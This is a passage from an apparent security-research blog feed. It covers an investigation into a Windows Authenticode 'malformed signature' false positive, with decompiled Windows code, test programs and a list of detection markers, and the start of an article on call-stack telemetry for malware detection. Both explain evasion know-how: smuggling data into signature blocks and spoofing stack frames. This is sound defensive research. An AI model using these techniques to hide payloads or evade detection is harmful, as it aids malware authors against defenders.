<p>To investigate further, we created a basic test program that called the Windows <code>WinVerifyTrust</code> function against the problematic executable to manually validate the signature. This revealed that it was failing with the error code <code>TRUST_E_MALFORMED_SIGNATURE</code>.</p>
<p><code>WinVerifyTrust</code> is a complex function, but after attaching a debugger, we discovered that the error code was being set at the following point:</p>
<pre><code class="language-c">dwReserved1 = psSipSubjectInfo-&gt;dwReserved1;
if(!dwReserved1)
    goto LABEL_58;
v40 = I_GetRelaxedMarkerCheckFlags(a1, v22, (unsigned int *)&amp;pvData);
if(v40 &lt; 0)
    break;
if(!pvData)
    v42 = 0x80096011;    // TRUST_E_MALFORMED_SIGNATURE
</code></pre>
<p>As shown above, if <code>psSipSubjectInfo-&gt;dwReserved1</code> is not <code>0</code>, the code calls <code>I_GetRelaxedMarkerCheckFlags</code>. If this function returns no data, the code sets the <code>TRUST_E_MALFORMED_SIGNATURE</code> error and exits.</p>
<p>When stepping through the code with our problematic binary, we saw that <code>dwReserved1</code> was indeed set to <code>1</code>. Running the same test against a correctly signed binary, this value was always <code>0</code>, which skips the call to <code>I_GetRelaxedMarkerCheckFlags</code>.</p>
<p>Looking into <code>I_GetRelaxedMarkerCheckFlags</code>, we saw that it simply checks for the presence of a specific attribute: <code>1.3.6.1.4.1.311.2.6.1</code>. A quick online search turned up very little other than the fact that this object identifier (OID) is labeled as <code>SpcRelaxedPEMarkerCheck</code>.</p>
<pre><code class="language-c">__int64 __fastcall I_GetRelaxedMarkerCheckFlags(struct _CRYPT_PROVIDER_DATA *a1, DWORD a2, unsigned int *a3)
{
    unsigned int v4; // ebx
    CRYPT_PROVIDER_SGNR *ProvSignerFromChain; // rax
    PCRYPT_ATTRIBUTE Attribute; // rax
    signed int LastError; // eax
    DWORD pcbStructInfo; // [rsp+60h] [rbp+18h] BYREF

    pcbStructInfo = 4;
    v4 = 0;
    *a3 = 0;
    ProvSignerFromChain = WTHelperGetProvSignerFromChain(a1, a2, 0, 0);
    if(ProvSignerFromChain)
    {
        Attribute = CertFindAttribute(
            &quot;1.3.6.1.4.1.311.2.6.1&quot;,
            ProvSignerFromChain-&gt;psSigner-&gt;AuthAttrs.cAttr,
            ProvSignerFromChain-&gt;psSigner-&gt;AuthAttrs.rgAttr);
        if(Attribute)
        {
            if(!CryptDecodeObject(
                a1-&gt;dwEncoding,
                (LPCSTR)0x1B,
                Attribute-&gt;rgValue-&gt;pbData,
                Attribute-&gt;rgValue-&gt;cbData,
                0,
                a3,
                &amp;pcbStructInfo))
            {
                return HRESULT_FROM_WIN32(GetLastError());
            }
        }
    }

    return v4;
}
</code></pre>
<p>Our binary did not have this attribute, which caused the function to return no data and triggered the error. The function names reminded us of an optional parameter that we had previously seen in <code>signtool.exe</code>:</p>
<blockquote>
<p><code>/rmc</code> - Specifies signing a PE file with the relaxed marker check semantic. The flag is ignored for non-PE files. During verification, certain authenticated sections of the signature will bypass invalid PE markers check. This option should only be used after careful consideration and reviewing the details of MSRC case MS12-024 to ensure that no vulnerabilities are introduced.</p>
</blockquote>
<p>Based on our analysis, we suspected that re-signing the executable with the “relaxed marker check” flag (<code>/rmc</code>) would resolve the issue. We re-signed it and, as expected, the signature was now valid.</p>
<h3>Root cause analysis</h3>
<p>While the workaround above resolved our immediate problem, it clearly wasn’t the root cause. We needed to investigate further to understand why the internal <code>dwReserved1</code> flag was set in the first place.</p>
<p>This field is part of the <code>SIP_SUBJECTINFO</code> structure, which is <a href="https://learn.microsoft.com/en-us/windows/win32/api/mssip/ns-mssip-sip_subjectinfo">documented on MSDN</a> - but unfortunately, it didn’t help much in this case:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/malformed-authenticode-signature/image3.png" alt="SIP_SUBJECTINFO structure comment" title="SIP_SUBJECTINFO structure comment" /></p>
<p>To find where this field was being set, we worked backwards and identified a point where <code>dwReserved1</code> was still <code>0</code> - i.e., before the flag had been set. We placed a hardware breakpoint (on write) on the <code>dwReserved1</code> field and resumed execution. The breakpoint was hit in the <code>SIPObjectPE_::GetMessageFromFile</code> function:</p>
<pre><code class="language-c">__int64 __fastcall SIPObjectPE_::GetMessageFromFile(
    SIPObjectPE_ *this,
    struct SIP_SUBJECTINFO_ *a2,
    struct _WIN_CERTIFICATE *a3,
    unsigned int a4,
    unsigned int *a5)
{
    __int64 v5; // rcx
    __int64 result; // rax
    DWORD v8; // [rsp+40h] [rbp+8h] BYREF

    v5 = *((_QWORD*)this + 1);
    v8 = 0;
    result = ImageGetCertificateDataEx(v5, a4, a3, a5, &amp;v8);
    if((_DWORD)result)
        a2-&gt;dwReserved1 = v8;

    return result;
}
</code></pre>
<p>This function calls the <code>ImageGetCertificateDataEx</code> API, which is exported by <code>imagehlp.dll</code>. The value returned through the function's fifth parameter is stored in <code>dwReserved1</code>; this value ultimately determines whether the PE is considered &quot;malformed&quot; in the manner we have been observing.</p>
<p>Unfortunately, <code>ImageGetCertificateDataEx</code> is undocumented on MSDN. However, an earlier variant, <code>ImageGetCertificateData</code>, <a href="https://learn.microsoft.com/en-us/windows/win32/api/imagehlp/nf-imagehlp-imagegetcertificatedata">is documented</a>:</p>
<pre><code class="language-c">BOOL IMAGEAPI ImageGetCertificateData(
  [in]      HANDLE            FileHandle,
  [in]      DWORD             CertificateIndex,
  [out]     LPWIN_CERTIFICATE Certificate,
  [in, out] PDWORD            RequiredLength
);
</code></pre>
<p>This function extracts the contents of the <code>IMAGE_DIRECTORY_ENTRY_SECURITY</code> directory from the PE headers. Manual analysis of the <code>ImageGetCertificateDataEx</code> function showed that the first four parameters match those of <code>ImageGetCertificateData</code>, but with one additional output parameter at the end.</p>
<p>We wrote a simple test program that allows us to call this function and perform checks against the unknown fifth parameter:</p>
<pre><code class="language-c">#include &lt;stdio.h&gt;
#include &lt;windows.h&gt;
#include &lt;imagehlp.h&gt;

int main()
{
    HANDLE hFile = NULL;
    DWORD dwCertLength = 0;
    WIN_CERTIFICATE *pCertData = NULL;
    DWORD dwUnknown = 0;
    BOOL (WINAPI *pImageGetCertificateDataEx)(HANDLE FileHandle, DWORD CertificateIndex, LPWIN_CERTIFICATE Certificate, PDWORD RequiredLength, DWORD *pdwUnknown);

    // open target executable
    hFile = CreateFileA(&quot;C:\\users\\matthew\\sample-executable.exe&quot;, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
    if(hFile == INVALID_HANDLE_VALUE)
    {
        printf(&quot;Failed to open input file\n&quot;);
        return 1;
    }

    // locate ImageGetCertificateDataEx export in imagehlp.dll
    pImageGetCertificateDataEx = (BOOL(WINAPI*)(HANDLE,DWORD,LPWIN_CERTIFICATE,PDWORD,DWORD*))GetProcAddress(LoadLibraryA(&quot;imagehlp.dll&quot;), &quot;ImageGetCertificateDataEx&quot;);
    if(pImageGetCertificateDataEx == NULL)
    {
        printf(&quot;Failed to locate ImageGetCertificateDataEx\n&quot;);
        return 1;
    }

    // get required length
    dwCertLength = 0;
    if(pImageGetCertificateDataEx(hFile, 0, NULL, &amp;dwCertLength, &amp;dwUnknown) == 0)
    {
        if(GetLastError() != ERROR_INSUFFICIENT_BUFFER)
        {
            printf(&quot;ImageGetCertificateDataEx error (1)\n&quot;);
            return 1;
        }
    }

    // allocate data
    printf(&quot;Allocating %u bytes for certificate...\n&quot;, dwCertLength);
    pCertData = (WIN_CERTIFICATE*)malloc(dwCertLength);
    if(pCertData == NULL)
    {
        printf(&quot;Failed to allocate memory\n&quot;);
        return 1;
    }

    // read certificate data and dwUnknown flag
    if(pImageGetCertificateDataEx(hFile, 0, pCertData, &amp;dwCertLength, &amp;dwUnknown) == 0)
    {
        printf(&quot;ImageGetCertificateDataEx error (2)\n&quot;);
        return 1;
    }

    printf(&quot;Finished - dwUnknown: %u\n&quot;, dwUnknown);

    return 0;
}
</code></pre>
<p>Running this against a variety of executables confirmed our expectations: the unknown output parameter was <code>1</code> for our “broken” executable, and <code>0</code> for correctly signed binaries. This confirmed that the issue originated somewhere within the <code>ImageGetCertificateDataEx</code> function.</p>
<p>Further analysis of this function revealed that the unknown flag is being set by another internal function: <code>IsBufferCleanOfInvalidMarkers</code>.</p>
<pre><code class="language-c">...
if(!IsBufferCleanOfInvalidMarkers(v25, v15, pdwUnknown))
{
    LastError = GetLastError();
    if(!pdwUnknown)
        goto LABEL_34;
}
...
</code></pre>
<p>After cleaning up the <code>IsBufferCleanOfInvalidMarkers</code> function, we observed the following:</p>
<pre><code class="language-c">DWORD IsBufferCleanOfInvalidMarkers(BYTE *pData, DWORD dwLength, DWORD *pdwInvalidMarkerFound)
{
    if(!_InterlockedCompareExchange64(&amp;global_InvalidMarkerList, 0, 0))
        LoadInvalidMarkers();

    if(!RabinKarpFindPatternInBuffer(pData, dwLength, pdwInvalidMarkerFound))
        return 1;

    SetLastError(0x80096011); // TRUST_E_MALFORMED_SIGNATURE

    return 0;
}
</code></pre>
<p>This function loads a global list of &quot;invalid markers&quot; using <code>LoadInvalidMarkers</code>, if they are not already loaded. <code>imagehlp.dll</code> contains a hardcoded default list of markers, but also checks the registry for a user-defined list at the following path:</p>
<p><code>HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Wintrust\Config\PECertInvalidMarkers</code></p>
<p>This registry value does not appear to exist by default.</p>
<p>The function then performs a search across the entire PE signature data, looking for any of these markers. If a match is found, <code>pdwInvalidMarkerFound</code> is set to <code>1</code>, which maps directly to the <code>psSipSubjectInfo-&gt;dwReserved1</code> value mentioned earlier.</p>
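The scan logic can be approximated in portable C as follows. This is a simplified stand-in, not the actual implementation: the real function uses a Rabin-Karp rolling hash over the full marker list, while this sketch does a naive search over three example markers.

```c
#include <stddef.h>
#include <string.h>

/*
 * Simplified stand-in for imagehlp's IsBufferCleanOfInvalidMarkers.
 * The real function uses a Rabin-Karp rolling hash over the full
 * marker list; a naive memcmp scan produces the same result.
 * Only three example markers are included here.
 */
typedef struct {
    const unsigned char *bytes;
    size_t length;
} MARKER;

static const MARKER g_markers[] = {
    { (const unsigned char *)"PK\x03\x04", 4 },   /* ZIP local file header */
    { (const unsigned char *)"Rar!\x1A\x07", 7 }, /* RAR archive (incl. trailing NUL) */
    { (const unsigned char *)"EGGA", 4 },         /* ALZip EGG archive */
};

/* Returns 1 if the buffer is clean, 0 if any marker is present
 * (matching the decompiled function's return convention). */
int is_buffer_clean(const unsigned char *pData, size_t dwLength)
{
    for (size_t m = 0; m < sizeof(g_markers) / sizeof(g_markers[0]); m++) {
        const MARKER *pm = &g_markers[m];
        for (size_t i = 0; pm->length <= dwLength && i <= dwLength - pm->length; i++) {
            if (memcmp(pData + i, pm->bytes, pm->length) == 0)
                return 0; /* invalid marker found */
        }
    }
    return 1; /* clean */
}
```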
<h3>Dumping the invalid markers</h3>
<p>The markers are stored in an undocumented structure inside <code>imagehlp.dll</code>. After reverse-engineering the <code>RabinKarpFindPatternInBuffer</code> function noted above, we wrote a small tool to dump the entire list of markers:</p>
<pre><code class="language-c">#include &lt;stdio.h&gt;
#include &lt;windows.h&gt;
#include &lt;ctype.h&gt;

int main()
{
    HMODULE hModule = LoadLibraryA(&quot;imagehlp.dll&quot;);

    // hardcoded address - imagehlp.dll version:
    // 509ef25f9bac59ebf1c19ec141cb882e5c1a8cb61ac74a10a9f2bd43ed1f0585
    BYTE *pInvalidMarkerData = (BYTE*)hModule + 0xC4D8;

    BYTE *pEntryList = (BYTE*)*(DWORD64*)(pInvalidMarkerData + 20);
    DWORD dwEntryCount = *(DWORD*)pInvalidMarkerData;
    for(DWORD i = 0; i &lt; dwEntryCount; i++)
    {
        BYTE *pCurrEntry = pEntryList + (i * 18);
        BYTE bLength = *(BYTE*)(pCurrEntry + 9);
        BYTE *pString = (BYTE*)*(DWORD64*)(pCurrEntry + 10);
        for(DWORD ii = 0; ii &lt; bLength; ii++)
        {
            if(isprint(pString[ii]))
            {
                // printable character
                printf(&quot;%c&quot;, pString[ii]);
            }
            else
            {
                // non-printable character
                printf(&quot;\\x%02X&quot;, pString[ii]);
            }
        }
        printf(&quot;\n&quot;);
    }

    return 0;
}
</code></pre>
<p>This produced the following results:</p>
<pre><code>PK\x01\x02
PK\x05\x06
PK\x03\x04
PK\x07\x08
Rar!\x1A\x07\x00
z\xBC\xAF'\x1C
**ACE**
!&lt;arch&gt;\x0A
MSCF\x00\x00\x00\x00
\xEF\xBE\xAD\xDENull
Initializing Wise Installation Wizard
zlb\x1A
KGB_arch
KGB2\x00
KGB2\x01
ENC\x00
disk%i.pak
&gt;-\x1C\x0BxV4\x12
ISc(
Smart Install Maker
\xAE\x01NanoZip
;!@Install@
EGGA
ArC\x01
StuffIt!
-sqx-
PK\x09\x0A
&quot;\x0B\x01\x0B
-lh0-
-lh1-
-lh2-
-lh3-
-lh4-
-lh5-
-lh6-
-lh7-
-lh8-
-lh9-
-lha-
-lhb-
-lhc-
-lhd-
-lhe-
-lzs-
-lz2-
-lz3-
-lz4-
-lz5-
-lz7-
-lz8-
&lt;#$@@$#&gt;
</code></pre>
<p>As expected, this appears to be a list of magic values pertaining to old installers and compressed archive formats. This aligns with the description of <a href="https://learn.microsoft.com/en-us/security-updates/securitybulletins/2013/ms13-098">MS13-098</a>, which hints towards certain installers being affected.</p>
<p>We suspected this was related to self-extracting executables. If an executable reads itself from disk and scans its own data for an embedded archive (e.g., a ZIP file), an attacker could append malicious data to the signature section without invalidating the signature, since the security directory is excluded from the Authenticode hash. This could cause the vulnerable executable to locate the malicious data before the original data, especially if it scans backwards from the end of the file.</p>
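To make the attack surface concrete, consider a self-extractor that locates its payload by scanning its own file image backwards for a ZIP end-of-central-directory magic ("PK\x05\x06"). The sketch below is hypothetical and not taken from any real installer; it simply shows why appended data wins a backwards search:

```c
#include <stddef.h>
#include <string.h>

/*
 * Illustration of the vulnerable pattern: a self-extractor that
 * searches its own file image backwards for a ZIP end-of-central-
 * directory record will find attacker data appended to the signature
 * block before it finds the legitimate archive. Hypothetical sketch.
 */
long find_last_zip_eocd(const unsigned char *file, size_t size)
{
    static const unsigned char magic[4] = { 'P', 'K', 0x05, 0x06 };
    if (size < sizeof(magic))
        return -1;
    /* scan backwards from the end of the file */
    for (size_t i = size - sizeof(magic) + 1; i-- > 0; ) {
        if (memcmp(file + i, magic, sizeof(magic)) == 0)
            return (long)i; /* last (i.e. appended) occurrence wins */
    }
    return -1;
}
```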
<p>We later found an old <a href="https://recon.cx/2012/schedule/events/246.en.html">RECon talk from 2012 by Igor Glücksmann</a>, which describes this exact scenario and appears to confirm our hypothesis.</p>
<p>Microsoft's fix involved scanning the PE signature block for known byte patterns that could indicate this type of abuse.</p>
<h3>Investigating the false positive</h3>
<p>Upon further debugging, we discovered that the binary was being flagged due to the signature data containing the <code>EGGA</code> marker from the list above:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/malformed-authenticode-signature/image1.png" alt="EGGA marker" title="EGGA marker" /></p>
<p>In the context of the list of markers above, the <code>EGGA</code> signature appears to relate to a specific header value used by an archive format called <a href="http://justsolve.archiveteam.org/wiki/EGG_(ALZip)">ALZip</a>. Our code does not make any use of this file format.</p>
<p>Microsoft’s heuristic treated the presence of <code>EGGA</code> as evidence that malicious archive data had been embedded in the PE signature. In practice, nothing of the sort was present. The signature block itself happened to include those four bytes as part of the hashed data.</p>
<p>Collisions like this are unusual, but page hashing (<code>/ph</code>) made it more likely. By expanding the size of the signature block, page hashing increases the surface area for coincidental matches and increases the likelihood of triggering the heuristic.</p>
<p>The binary didn’t contain any self-extracting routines, so the hit on <code>EGGA</code> was a false positive. In that context, the warning had no bearing on the file’s integrity. This meant it was safe to re-sign the file with <code>/rmc</code> to restore the expected validation.</p>
<h3>Conclusion</h3>
<p>It is well known that additional data can be embedded in a PE file without breaking its signature by appending it to the security block. Even some <a href="https://learn.microsoft.com/en-us/archive/blogs/ieinternals/caveats-for-authenticode-code-signing">legitimate software products</a> take advantage of this to embed user-specific metadata into signed executables. However, we were not aware that Microsoft had implemented heuristics to detect specific malicious cases of this, even though they were introduced back in 2012.</p>
<p>The original error message was very vague, and we were unable to find any documentation or references online that helped explain the behavior. Even searching for the associated registry value after discovering it (<code>PECertInvalidMarkers</code>) yielded zero results.</p>
<p>What we uncovered is that Microsoft added heuristic scanning of signature blocks more than a decade ago to counter specific abuse cases. Those heuristics reside in a hardcoded list of “invalid markers,” many of which are tied to outdated installers and archive formats. Our binary happened to collide with one of those markers when signed with page hashing enabled, creating a validation failure with no clear documentation and no public references to the underlying registry key or detection logic.</p>
<p>The absence of online discussions regarding this failure mode, aside from a single unresolved <a href="https://developercommunity.visualstudio.com/t/malformed-digital-signature-ms13-098-1/235599">Visual Studio Developer Community post from 2018</a>, made the initial diagnosis difficult. By publishing this analysis, we want to provide a technical reference point for others who may encounter the same problem. In our case, resolving the issue required deep troubleshooting that few outside this space would normally need to exercise. For teams automating code signing, the key lesson is to integrate signature validation checks early and be aware that heuristic marker detection can lead to edge-case failures.</p>
<h2>Additional references</h2>
<p>The author can be found on X at <a href="https://x.com/x86matthew">@x86matthew.</a></p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/malformed-authenticode-signature/malformed-authenticode-signature.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Call Stacks: No More Free Passes For Malware]]></title>
            <link>https://www.elastic.co/kr/security-labs/call-stacks-no-more-free-passes-for-malware</link>
            <guid>call-stacks-no-more-free-passes-for-malware</guid>
            <pubDate>Thu, 12 Jun 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[We explore the immense value that call stacks bring to malware detection and why Elastic considers them to be vital Windows endpoint telemetry despite the architectural limitations.]]></description>
            <content:encoded><![CDATA[<h2>Call stacks provide the who</h2>
<p>One of Elastic’s key Windows endpoint telemetry differentiators is <strong>call stacks</strong>.</p>
<p>Most detections rely on <em>what</em> is happening — and this is often insufficient as most behaviours are dual purpose. With call stacks, we add the fine-grained ability to also determine <em>who</em> is performing the activity. This combination gives us an unparalleled ability to uncover malicious activity. By feeding this deep telemetry to <a href="https://www.elastic.co/kr/docs/reference/integrations/endpoint">Elastic Defend</a>’s on-host rule engine, we can quickly respond to emerging threats.</p>
<h2>Call stacks are a beautiful lie</h2>
<p>In computer science, a <a href="https://en.wikipedia.org/wiki/Stack_(abstract_data_type)">stack</a> is a last-in, first-out data structure. Similar to a stack of physical items, it is only possible to add or remove the top element. A <a href="https://www.elastic.co/kr/security-labs/peeling-back-the-curtain-with-call-stacks">call stack</a> is a stack that contains information about the currently active subroutine calls.</p>
<p>On x64 hosts, this call stack can only be accurately generated using execution tracing features on the CPU, such as <a href="https://www.blackhat.com/docs/us-16/materials/us-16-Pierce-Capturing-0days-With-PERFectly-Placed-Hardware-Traps-wp.pdf">Intel LBR</a>, Intel BTS, Intel AET, <a href="https://www.microsoft.com/en-us/research/wp-content/uploads/2017/01/griffin-asplos17.pdf">Intel IPT</a>, and <a href="https://lwn.net/Articles/824613/">x64 Architectural LBR</a>. These tracing features were designed for performance profiling and debugging purposes, but can be used in some security scenarios as well. However, what is more generally available is an <em>approximate</em> call stack that is recovered from a thread’s data stack via a mechanism called <a href="https://github.com/jdu2600/conference_talks/blob/main/2022-04-csidescbr-StackWalking.pdf">stack walking</a>.</p>
<p>In the <a href="https://codemachine.com/articles/x64_deep_dive.html">x64 architecture</a>, the “stack pointer register” (<code>rsp</code>) unsurprisingly points to a stack data structure, and there are efficient instructions to read and write the data on this stack. Additionally, the <code>call</code> instruction transfers control to a new subroutine but also saves a return address at the memory address referenced by the stack pointer. A <code>ret</code> instruction will later retrieve this saved address so that execution can return to where it left off. Functions in most programming languages are typically implemented using these two instructions, and both function parameters and local function variables will typically be allocated on this stack for performance. The portion of the stack related to a single function is called a stack frame.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/call-stacks-no-more-free-passes-for-malware/image2.png" alt="Windows x64 Calling Convention: Stack Frame - source https://www.ired.team/miscellaneous-reversing-forensics/windows-kernel-internals/windows-x64-calling-convention-stack-frame" /></p>
<p>Stack walking is the recovery of just the return addresses from the heterogeneous data stored on the thread stack. Return addresses need to be stored somewhere for control flow — so stack walking co-opts this existing data to <strong>approximate</strong> a call stack. This is entirely suitable for most debugging and performance profiling scenarios, but slightly less helpful for security auditing. The main issue is that you can’t disassemble backwards. You can always determine the return address for a given call site, but not the converse. The best approach you can take is to check each of the 15 possible preceding instruction lengths and see which disassembles to exactly one call instruction. Even then, all you have recovered is a <em>previous</em> call site — not necessarily the exact <em>preceding</em> call site. This is because most compilers use <a href="https://en.wikipedia.org/wiki/Tail_call">tail call</a> optimisation to omit unnecessary stack frames. This creates <a href="https://youtu.be/9SqDY0wMmHE">annoying scenarios for security</a> like there being no guarantee that the Win32StartAddress function will be on the stack even though it was called.</p>
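The asymmetry can be illustrated with a common fallback heuristic: check whether a known call encoding ends immediately before a candidate return address. The sketch below checks only two frequent x64 encodings; a real stack walker would have to try every instruction length up to 15 with a full disassembler, and even then a match only proves that a previous call site existed.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * Minimal call-site heuristic: does a common x64 call encoding end
 * immediately before the return address at offset `ret` in `code`?
 * A real stack walker would disassemble candidates at every length
 * up to 15 bytes; this sketch checks just two frequent encodings.
 */
int preceded_by_call(const uint8_t *code, size_t ret)
{
    /* E8 rel32 : 5-byte near relative call */
    if (ret >= 5 && code[ret - 5] == 0xE8)
        return 1;
    /* FF /2 : 2-byte register-indirect call (e.g. FF D0 = call rax) */
    if (ret >= 2 && code[ret - 2] == 0xFF && (code[ret - 1] & 0xF8) == 0xD0)
        return 1;
    return 0;
}
```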
<p>So what we usually refer to as a call stack is actually a return address stack.</p>
<p>Malware authors use this ambiguity to lie. They either craft trampoline stack frames through legitimate modules to hide calls originating from malicious code, or they coerce stack walking into predicting different return addresses than those the CPU will execute. Of course, malware has always just been an attempt to lie, and antimalware is just the process of exposing that lie.</p>
<p>“... but at the length truth will out.”
- William Shakespeare, The Merchant of Venice, Act 2, Scene 2</p>
<h2>Making call stacks beautiful</h2>
<p>So far, a stack walk is just a list of numeric memory addresses. To make these addresses useful for analysis, we need to enrich them with context. (Note: we don’t currently include kernel stack frames.)</p>
<p>The minimum useful enrichment is to convert these addresses into offsets within modules (e.g. <code>ntdll.dll+0x15c9c4</code>). This would only catch the most egregious malware though — we can go deeper. The most important modules on Windows are those that implement the Native and Win32 APIs. The application binary interface for these APIs requires that the name of each function be included in the <a href="https://learn.microsoft.com/en-us/windows/win32/debug/pe-format#the-edata-section-image-only">Export Directory</a> of the containing module. This is the information that Elastic currently uses to enrich its endpoint call stacks.</p>
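A minimal sketch of this first enrichment level, mapping a raw return address to module+offset against a hypothetical table of loaded modules. The real implementation walks the loader's module list and then parses the Export Directory for the closest named export; the module base and size below are made up for illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/*
 * Minimal module+offset enrichment: render a raw return address as
 * "module.dll+0xOFFSET" against a table of loaded modules.
 * Hypothetical module table; a real implementation would walk the
 * loader's module list and consult each module's Export Directory.
 */
typedef struct {
    uint64_t base;
    uint64_t size;
    const char *name;
} MODULE_INFO;

int symbolize(uint64_t addr, const MODULE_INFO *mods, size_t count,
              char *out, size_t outlen)
{
    for (size_t i = 0; i < count; i++) {
        if (addr >= mods[i].base && addr < mods[i].base + mods[i].size) {
            snprintf(out, outlen, "%s+0x%llx", mods[i].name,
                     (unsigned long long)(addr - mods[i].base));
            return 1;
        }
    }
    /* no backing module: possible shellcode */
    snprintf(out, outlen, "Unbacked");
    return 0;
}
```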
<p>A more accurate enrichment could be achieved by using the public symbols (if available) <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/microsoft-public-symbols">hosted</a> on the vendor’s infrastructure (especially Microsoft). While this method offers deeper fidelity, it comes with higher operational costs and isn’t feasible for our air-gapped customers.</p>
<p>A rule of thumb for Microsoft kernel and native symbols is that the exported interface of each component has a capitalised prefix such as Ldr, Tp or Rtl. Private functions extend this prefix with a p. By default, private functions with external linkage are included in the <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/public-and-private-symbols">public symbol table</a>. A very large offset might indicate a very large function, but it could also just indicate an unnamed function that you don’t have symbols for. A general guideline would be to consider any triple-digit and larger offsets in an exported function as likely belonging to another function.</p>
<table>
<thead>
<tr>
<th align="left">Call Stack</th>
<th align="left">Stack Walk</th>
<th align="left">Stack Walk Modules</th>
<th align="left">Stack Walk Exports (Elastic approach)</th>
<th align="left">Stack Walk Public Symbols</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">0x7ffb8eb9c9c2 <strong>0x12d383f0046</strong> 0x7ffb8eb1a9d8 0x7ffb8eb1aaf4 0x7ffb8ea535ff 0x7ffb8da5e8cf 0x7ffb8eaf14eb</td>
<td align="left">0x7ffb8eb9c9c4 0x7ffb8c3c71d6 0x7ffb8eb1a9ed 0x7ffb8eb1aaf9 0x7ffb8ea53604 0x7ffb8da5e8d4 0x7ffb8eaf14f1</td>
<td align="left">ntdll.dll+0x15c9c4 kernelbase.dll+0xc71d6 ntdll.dll+0xda9ed ntdll.dll+0xdaaf9 ntdll.dll+0x13604 kernel32.dll+0x2e8d4 ntdll.dll+0xb14f1</td>
<td align="left">ntdll.dll!NtProtectVirtualMemory+0x14 kernelbase.dll!VirtualProtect+0x36 ntdll.dll!RtlAddRefActivationContext+0x40d ntdll.dll!RtlAddRefActivationContext+0x519 ntdll.dll!RtlAcquireSRWLockExclusive+0x974 kernel32.dll!BaseThreadInitThunk+0x14 ntdll.dll!RtlUserThreadStart+0x21</td>
<td align="left">ntdll.dll!NtProtectVirtualMemory+0x14 kernelbase.dll!VirtualProtect+0x36 ntdll.dll!RtlTpTimerCallback+0x7d ntdll.dll!TppTimerpExecuteCallback+0xa9 ntdll.dll!TppWorkerThread+0x644 kernel32.dll!BaseThreadInitThunk+0x14 ntdll.dll!RtlUserThreadStart+0x21</td>
</tr>
</tbody>
</table>
<p>Comparison of Call Stack Enrichment Levels</p>
<p>In the above example, the shellcode at 0x12d383f0000 deliberately used a tail call so that its address wouldn’t appear in the stack walk. This lie-by-omission is apparent even with only the stack walk. Elastic reports this with the <code>proxy_call</code> heuristic as the malware registered a timer callback function to proxy the call to <code>VirtualProtect</code> from a different thread.</p>
<h2><strong>Making call stacks powerful</strong></h2>
<p>The call stacks of the system calls that we monitor with <a href="https://www.elastic.co/kr/security-labs/kernel-etw-best-etw">Event Tracing for Windows</a> (ETW) have an expected structure. At the bottom of the stack is the thread StartAddress - typically ntdll.dll!RtlUserThreadStart. This is followed by the Win32 API thread entry - kernel32.dll!BaseThreadInitThunk and then the first user module. A user module is application code that is not part of the Win32 (or Native) API. This first user module should match the thread’s Win32StartAddress (unless that function used a tail call). More user modules will follow until the final user module makes a call into a Win32 API that makes a Native API call, which finally results in a system call to the kernel.</p>
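The expected bottom-of-stack structure lends itself to a simple triage check. A hypothetical sketch, taking frame strings as produced by export-based enrichment, most recent call first:

```c
#include <stddef.h>
#include <string.h>

/*
 * Hypothetical triage helper: verify that the bottom of a stack walk
 * ends with the expected Native and Win32 thread-start frames.
 * frames[0] is the most recent call; frames[n-1] is the thread start.
 * Real triage would also account for tail calls and fiber starts.
 */
int has_expected_thread_start(const char *frames[], size_t n)
{
    if (n < 2)
        return 0;
    return strstr(frames[n - 1], "ntdll.dll!RtlUserThreadStart") != NULL &&
           strstr(frames[n - 2], "kernel32.dll!BaseThreadInitThunk") != NULL;
}
```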
<p>From a detection standpoint, the most important module in this call stack is the <a href="https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+call_stack_final_user_module&amp;type=code">final user module</a>. Elastic shows this module, including its hash and any code signatures. These details aid in alert triage, but more importantly, they drastically improve the granularity at which we can baseline the behaviours of legitimate software that sometimes behaves like malware. The more accurately we can baseline normal, the harder it is for malware to blend in.</p>
<pre><code class="language-json">{
  &quot;process.thread.Ext&quot;: {
    &quot;call_stack_summary&quot;: &quot;ntdll.dll|kernelbase.dll|file.dll|rundll32.exe|kernel32.dll|ntdll.dll&quot;,
    &quot;call_stack&quot;: [
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!NtAllocateVirtualMemory+0x14&quot; }, /* Native API */
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\kernelbase.dll!VirtualAllocExNuma+0x62&quot; }, /* Win32 API */
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\kernelbase.dll!VirtualAllocEx+0x16&quot; }, /* Win32 API */
      {
        &quot;symbol_info&quot;: &quot;c:\\users\\user\\desktop\\file.dll+0x160d8b&quot;, /* final user module */
        &quot;callsite_trailing_bytes&quot;: &quot;488bf0488d4d88e8197ee2ff488bc64883c4685b5e5f415c415d415e415f5dc390909090905541574156415541545756534883ec58488dac2490000000488b71&quot;,
        &quot;callsite_leading_bytes&quot;: &quot;088b4d38894c2420488bca48894db8498bd0488955b0458bc1448945c4448b4d3044894dc0488d4d88e8e77de2ff488b4db8488b55b0448b45c4448b4dc0ffd6&quot;
      },
      { &quot;symbol_info&quot;: &quot;c:\\users\\user\\desktop\\file.dll+0x7b429&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\users\\user\\desktop\\file.dll+0x44a9&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\users\\user\\desktop\\file.dll+0x5f58&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\rundll32.exe+0x3bcf&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\rundll32.exe+0x6309&quot; }, /* first user module - typically the ETHREAD.Win32StartAddress module */
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\kernel32.dll!BaseThreadInitThunk+0x14&quot; }, /* Win32 API */
